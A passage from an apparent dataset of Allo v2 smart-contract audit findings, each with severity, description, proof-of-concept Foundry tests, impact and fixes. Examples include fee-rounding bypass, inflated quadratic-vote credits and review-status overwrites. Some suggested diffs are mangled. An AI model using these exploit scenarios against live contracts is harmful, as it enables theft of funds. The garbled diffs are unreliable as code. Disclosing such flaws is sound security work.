allocator.voiceCredits)) revert INVALID();\\n// Add the line below\\n allocator.voiceCredits // Add the line below\\n= voiceCreditsToAllocate;\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\nчEvery allocator has an unlimited number of votes.ч```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n -`recipientsCounter` should start from 1 in `DonationVotingMerkleDistributionBaseStrategy`чhighч```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n\\n```\\n function _getUintRecipientStatus(address _recipientId) internal view returns (uint8 status) {\\n // Get the column index and current row\\n (, uint256 colIndex, uint256 currentRow) = _getStatusRowColumn(_recipientId);\\n\\n // Get the status from the 'currentRow' shifting by the 'colIndex'\\n status = uint8((currentRow colIndex) & 15);\\n\\n // Return the status\\n return status;\\n }\\n```\\n\\n```\\n function _getStatusRowColumn(address _recipientId) internal view returns (uint256, uint256, uint256) {\\n uint256 recipientIndex = recipientToStatusIndexes[_recipientId];\\n\\n uint256 rowIndex = recipientIndex / 64; // 256 / 4\\n uint256 colIndex = (recipientIndex % 64) * 4;\\n\\n return (rowIndex, colIndex, statusesBitMap[rowIndex]);\\n }\\n```\\n\\n```\\n /// @notice The total number of recipients.\\n uint256 public recipientsCounter;\\n```\\n\\nConsider the following situation:\\nAlice is the first recipient calls `registerRecipient`\\n```\\n// in _registerRecipient\\nrecipientToStatusIndexes[Alice] = recipientsCounter = 0;\\n_setRecipientStatus(Alice, uint8(Status.Pending));\\nrecipientCounter++\\n```\\n\\nBob calls `registerRecipient`.\\n```\\n// in _getStatusRowColumn\\nrecipientToStatusIndexes[Bob] = 0 // It would access the status of Alice\\n// in _registerRecipient\\ncurrentStatus = _getUintRecipientStatus(recipientId) = Status.Pending\\ncurrentStatus != uint8(Status.None) -> no new application is recorded in the pool.\\n```\\n\\nThis implementation error makes the pool can only record the first application.чMake the counter start from 1. There are two methods to fix the issue.\\n\\n```\\n /// @notice The total number of recipients.\\n// Add the line below\\n uint256 public recipientsCounter;\\n// Remove the line below\\n uint256 public recipientsCounter;\\n```\\n\\n\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n// Add the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter // Add the line below\\n 1;\\n// Remove the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter// Add the line below\\n// Add the line below\\n;\\n …\\n }\\n```\\nчч```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n -`Registry.sol` generate clone `Anchor.sol` never work. Profile owner cannot use their `Anchor` walletчhighчAdd this test to `Registry.t.sol` test file to reproduce the issue.\\n```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log(\"registry address: %s\", address(registry()));\\n console.log(\"anchor address: %s\", profile.anchor);\\n console.log(\"anchor.registry: %s\", address(_anchor.registry()));\\n\\n emit log_named_bytes32(\"profile.id\", profile.id);\\n emit log_named_bytes32(\"anchor.profile.id\", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,\"wrong anchor registry\");\\n }\\n```\\n\\nWhat happen with `Anchor.sol` is it expect `msg.sender` is `Registry` contract. But in reality `msg.sender` is a proxy contract generated by Solady during `CREATE3` operation.\\n```\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);//@audit H Registry address here is not Registry. msg.sender is a proxy contract. Create3 deploy 2 contract. one is proxy. other is actual bytecode.\\n profileId = _profileId;\\n }\\n```\\n\\nThis can be seen with Solady comment for proxy contract. `msg.sender` above is middleman proxy contract. Not `Registry` contract. Solady generate 2 contract during CREATE3 operation. One is proxy contract. Second is actual bytecode.чMove `msg.sender` into constructor parameter\\n```\\nFile: allo-v2\\contracts\\core\\Registry.sol\\n bytes memory creationCode = abi.encodePacked(type(Anchor).creationCode, abi.encode(_profileId, address(this))); //@audit fix creation code\\n\\n // Use CREATE3 to deploy the anchor contract\\n anchor = CREATE3.deploy(salt, creationCode, 0); \\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n constructor(bytes32 _profileId, address _registry) {\\n registry = Registry(_registry);\\n profileId = _profileId;\\n }\\n```\\nч`Anchor.execute()` function will not work because `registry` address point to empty proxy contract and not actual `Registry` so all call will revert.\\n```\\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n```\\n\\nProfile owner cannot use their wallet `Anchor`. All funds send to this `Anchor` contract will be lost forever.ч```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log(\"registry address: %s\", address(registry()));\\n console.log(\"anchor address: %s\", profile.anchor);\\n console.log(\"anchor.registry: %s\", address(_anchor.registry()));\\n\\n emit log_named_bytes32(\"profile.id\", profile.id);\\n emit log_named_bytes32(\"anchor.profile.id\", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,\"wrong anchor registry\");\\n }\\n```\\n -`fundPool` does not work with fee-on-transfer tokenчmediumчIn `_fundPool`, the parameter for `increasePoolAmount` is directly the amount used in the `transferFrom` call.\\n```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n\\nWhen `_token` is a fee-on-transfer token, the actual amount transferred to `_strategy` will be less than `amountAfterFee`. Therefore, the current approach could lead to a recorded balance that is greater than the actual balance.чUse the change in `_token` balance as the parameter for `increasePoolAmount`.ч`fundPool` does not work with fee-on-transfer tokenч```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n -Exponential Inflation of Voice Credits in Quadratic Voting StrategyчmediumчIn the given code snippet, we observe a potential issue in the way voice credits are being accumulated for each recipient. The specific lines of code in question are:\\n```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n\\nWe can see that at the end :\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] = _allocator.voiceCreditsCastToRecipient[_recipientId] + _voiceCreditsToAllocate + _allocator.voiceCreditsCastToRecipient[_recipientId];\\n```\\n\\nHere, totalCredits accumulates both the newly allocated voice credits (_voiceCreditsToAllocate) and the credits previously cast to this recipient (creditsCastToRecipient). Later on, this totalCredits is added again to `voiceCreditsCastToRecipient[_recipientId]`, thereby including the previously cast credits once more\\nProof of Concept (POC):\\nLet's consider a scenario where a user allocates credits in three separate transactions:\\nTransaction 1: Allocates 5 credits\\ncreditsCastToRecipient initially is 0\\ntotalCredits = 5 (5 + 0)\\nNew voiceCreditsCastToRecipient[_recipientId] = 5\\nTransaction 2: Allocates another 5 credits\\ncreditsCastToRecipient now is 5 (from previous transaction)\\ntotalCredits = 10 (5 + 5)\\nNew voiceCreditsCastToRecipient[_recipientId] = 15 (10 + 5)\\nTransaction 3: Allocates another 5 credits\\ncreditsCastToRecipient now is 15\\ntotalCredits = 20 (5 + 15)\\nNew voiceCreditsCastToRecipient[_recipientId] = 35 (20 + 15)\\nFrom the above, we can see that the voice credits cast to the recipient are exponentially growing with each transaction instead of linearly increasing by 5 each timeчCode should be modified to only add the new voice credits to the recipient's tally. The modified line of code should look like:\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] += _voiceCreditsToAllocate;\\n```\\nчExponential increase in the voice credits attributed to a recipient, significantly skewing the results of the voting strategy( if one recipient receive 15 votes in one vote and another one receive 5 votes 3 times, the second one will have 20 votes and the first one 15) Over time, this could allow for manipulation and loss of trust in the voting mechanism and the percentage of amount received by recipients as long as allocations are used to calculate the match amount they will receive from the pool amount.ч```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n -RFPSimpleStrategy milestones can be set multiple timesчmediumчThe `setMilestones` function in `RFPSimpleStrategy` contract checks if `MILESTONES_ALREADY_SET` or not by `upcomingMilestone` index.\\n```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nBut `upcomingMilestone` increases only after distribution, and until this time will always be equal to 0.чFix condition if milestones should only be set once.\\n```\\nif (milestones.length > 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nOr allow milestones to be reset while they are not in use.\\n```\\nif (milestones.length > 0) {\\n if (milestones[0].milestoneStatus != Status.None) revert MILESTONES_ALREADY_IN_USE();\\n delete milestones;\\n}\\n```\\nчIt can accidentally break the pool state or be used with malicious intentions.\\nTwo managers accidentally set the same milestones. Milestones are duplicated and can't be reset, the pool needs to be recreated.\\nThe manager, in cahoots with the recipient, sets milestones one by one, thereby bypassing `totalAmountPercentage` check and increasing the payout amount.ч```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n -Allo#_fundPoolчmediumчLet's see the code of the `_fundPool` function:\\n```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n\\nThe `feeAmount` is calculated as follows:\\n```\\nfeeAmount = (_amount * percentFee) / getFeeDenominator();\\n```\\n\\nwhere `getFeeDenominator` returns `1e18` and `percentFee` is represented like that: `1e18` = 100%, 1e17 = 10%, 1e16 = 1%, 1e15 = 0.1% (from the comments when declaring the variable).\\nLet's say the pool uses a token like GeminiUSD which is a token with 300M+ market cap, so it's widely used, and `percentFee` == 1e15 (0.1%)\\nA user could circumvent the fee by depositing a relatively small amount. In our example, he can deposit 9 GeminiUSD. In that case, the calculation will be: `feeAmount = (_amount * percentFee) / getFeeDenominator() = (9e2 * 1e15) / 1e18 = 9e17/1e18 = 9/10 = 0;`\\nSo the user ends up paying no fee. There is nothing stopping the user from funding his pool by invoking the `fundPool` with such a small amount as many times as he needs to fund the pool with whatever amount he chooses, circumventing the fee.\\nEspecially with the low gas fees on L2s on which the protocol will be deployed, this will be a viable method to fund a pool without paying any fee to the protocol.чAdd a `minFundAmount` variable and check for it when funding a pool.чThe protocol doesn't collect fees from pools with low decimal tokens.ч```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n -The `RFPSimpleStrategy._registerRecipient()` does not work when the strategy was created using the `useRegistryAnchor=true` causing that nobody can register to the poolчmediumчThe `RFPSimpleStrategy` strategies can be created using the `useRegistryAnchor` which indicates whether to use the registry anchor or not. If the pool is created using the `useRegistryAnchor=true` the RFPSimpleStrategy._registerRecipient() will be reverted by RECIPIENT_ERROR. The problem is that when `useRegistryAnchor` is true, the variable recipientAddress is not collected so the function will revert by the RECIPIENT_ERROR.\\nI created a test where the strategy is created using the `userRegistryAnchor=true` then the `registerRecipient()` will be reverted by the `RECIPIENT_ERROR`.\\n```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test \"test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue\" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), \"RFPSimpleStrategy\");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: \"metadata\"});\\n address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\nчWhen the strategy is using `useRegistryAncho=true`, get the `recipientAddress` from the data:\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActivePool\\n returns (address recipientId)\\n {\\n bool isUsingRegistryAnchor;\\n address recipientAddress;\\n address registryAnchor;\\n uint256 proposalBid;\\n Metadata memory metadata;\\n\\n // Decode '_data' depending on the 'useRegistryAnchor' flag\\n if (useRegistryAnchor) {\\n /// @custom:data when 'true' // Remove the line below\\n> (address recipientId, uint256 proposalBid, Metadata metadata)\\n// Remove the line below\\n// Remove the line below\\n (recipientId, proposalBid, metadata) = abi.decode(_data, (address, uint256, Metadata));\\n// Add the line below\\n// Add the line below\\n (recipientId, recipientAddress, proposalBid, metadata) = abi.decode(_data, (address, address, uint256, Metadata));\\n\\n // If the sender is not a profile member this will revert\\n if (!_isProfileMember(recipientId, _sender)) revert UNAUTHORIZED();\\n```\\nчThe pool created with a strategy using the `userRegistryAnchor=true` can not get `registrants` because `_registerRecipient()` will be reverted all the time. If the pool is funded but no one can be allocated since there is not registered recipients, the deposited funds by others may be trapped because those are not distributed since there are not `registrants`.ч```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test \"test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue\" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), \"RFPSimpleStrategy\");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: \"metadata\"});\\n address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\n -`_distribute()` function in RFPSimpleStrategy contract has wrong requirement causing DOSчmediumчThe function _distribute():\\n```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n\\nLet's suppose this scenario:\\nPool manager funding the contract with 100 token, making `poolAmount` variable equal to 100\\nPool manager set 5 equal milestones with 20% each\\nSelected recipient's proposal bid is 100, making `recipients[acceptedRecipientId].proposalBid` variable equal to 100\\nAfter milestone 1 done, pool manager pays recipient using `distribute()`. Value of variables after: `poolAmount = 80 ,recipients[acceptedRecipientId].proposalBid = 100`\\nAfter milestone 2 done, pool manager will get DOS trying to pay recipient using `distribute()` because of this line:\\n```\\nif (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\nч```\\n- if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n+ if ((recipient.proposalBid * milestone.amountPercentage) / 1e18 > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\nчThis behaviour will cause DOS when distributing the 2nd milestone or higherч```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n -`QVBaseStrategy::reviewRecipients()` doesn't check if the recipient is already accepted or rejected, and overwrites the current statusчmediumчIn the QV strategy contracts, recipients register themselves and wait for a pool manager to accept the registration. Pool managers can accept or reject recipients with the `reviewRecipients()` function. There is also a threshold (reviewThreshold) for recipients to be accepted. For example, if the `reviewThreshold` is 2, a pending recipient gets accepted when two managers accept this recipient and the `recipientStatus` is updated.\\nHowever, `QVBaseStrategy::reviewRecipients()` function doesn't check the recipient's current status. This one alone may not be an issue because managers may want to change the status of the recipient etc.\\nBut on top of that, the function also doesn't take the previous review counts into account when updating the status, and overwrites the status immediately after reaching the threshold. I'll share a scenario later about this below.\\n```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nAs I mentioned above, the function updates the `recipientStatus` immediately after reaching the threshold. Here is a scenario of why this might be an issue.\\nExample Scenario\\nThe pool has 5 managers and the `reviewThreshold` is 2.\\nThe first manager rejects the recipient\\nThe second manager accepts the recipient\\nThe third manager rejects the recipient. -> `recipientStatus` updated -> `status = REJECTED`\\nThe fourth manager rejects the recipient -> status still `REJECTED`\\nThe last manager accepts the recipient ->recipientStatus updated again -> `status = ACCEPTED`\\n3 managers rejected and 2 managers accepted the recipient but the recipient status is overwritten without checking the recipient's previous status and is ACCEPTED now.\\nCoded PoC\\nYou can prove the scenario above with the PoC. You can use the protocol's own setup for this.\\n- Copy the snippet below and paste it into the `QVBaseStrategy.t.sol` test file.\\n- Run forge test `--match-test test_reviewRecipient_reviewTreshold_OverwriteTheLastOne`\\n```\\n//@audit More managers rejected but the recipient is accepted\\n function test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() public virtual {\\n address recipientId = __register_recipient();\\n\\n // Create rejection status\\n address[] memory recipientIds = new address[](1);\\n recipientIds[0] = recipientId;\\n IStrategy.Status[] memory Statuses = new IStrategy.Status[](1);\\n Statuses[0] = IStrategy.Status.Rejected;\\n\\n // Reject three times with different managers\\n vm.startPrank(pool_manager1());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager2());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager3());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // Three managers rejected. Status will be rejected.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Rejected));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n\\n // Accept two times after three rejections\\n Statuses[0] = IStrategy.Status.Accepted;\\n vm.startPrank(pool_admin());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager4());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // 3 Rejected, 2 Accepted, but status is Accepted because it overwrites right after passing threshold.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Accepted));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Accepted), 2);\\n }\\n```\\n\\nYou can find the test results below:\\n```\\nRunning 1 test for test/foundry/strategies/QVSimpleStrategy.t.sol:QVSimpleStrategyTest\\n[PASS] test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() (gas: 249604)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 10.92ms\\n```\\nчChecking the review counts before updating the state might be helpful to mitigate this issueчRecipient status might be overwritten with less review counts.ч```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n -CREATE3 is not available in the zkSync Era.чmediumчThe zkSync Era docs explain how it differs from Ethereum.\\nPOC:\\n```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport \"./MiniContract.sol\";\\nimport \"./CREATE3.sol\";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256(\"SALT\");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n\\nAlso, the logic to compute the address of Create2 is different from Ethereum, as shown below, so the CREATE3 library cannot be used as it is.\\nThis cause registry returns an incorrect `preCalculatedAddress`, causing the anchor to be registered to an address that is not the actual deployed address.\\n```\\naddress ⇒ keccak256( \\n keccak256(\"zksyncCreate2\") ⇒ 0x2020dba91b30cc0006188af794c2fb30dd8520db7e2c088b7fc7c103c00ca494, \\n sender, \\n salt, \\n keccak256(bytecode), \\n keccak256(constructorInput)\\n ) \\n```\\nчThis can be solved by implementing CREATE2 directly instead of CREATE3 and using `type(Anchor).creationCode`. Also, the compute address logic needs to be modified for zkSync.ч`generateAnchor` doesn't work, so user can't do anything related to anchor.ч```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport \"./MiniContract.sol\";\\nimport \"./CREATE3.sol\";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256(\"SALT\");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n -Anchor contract is unable to receive NFTs of 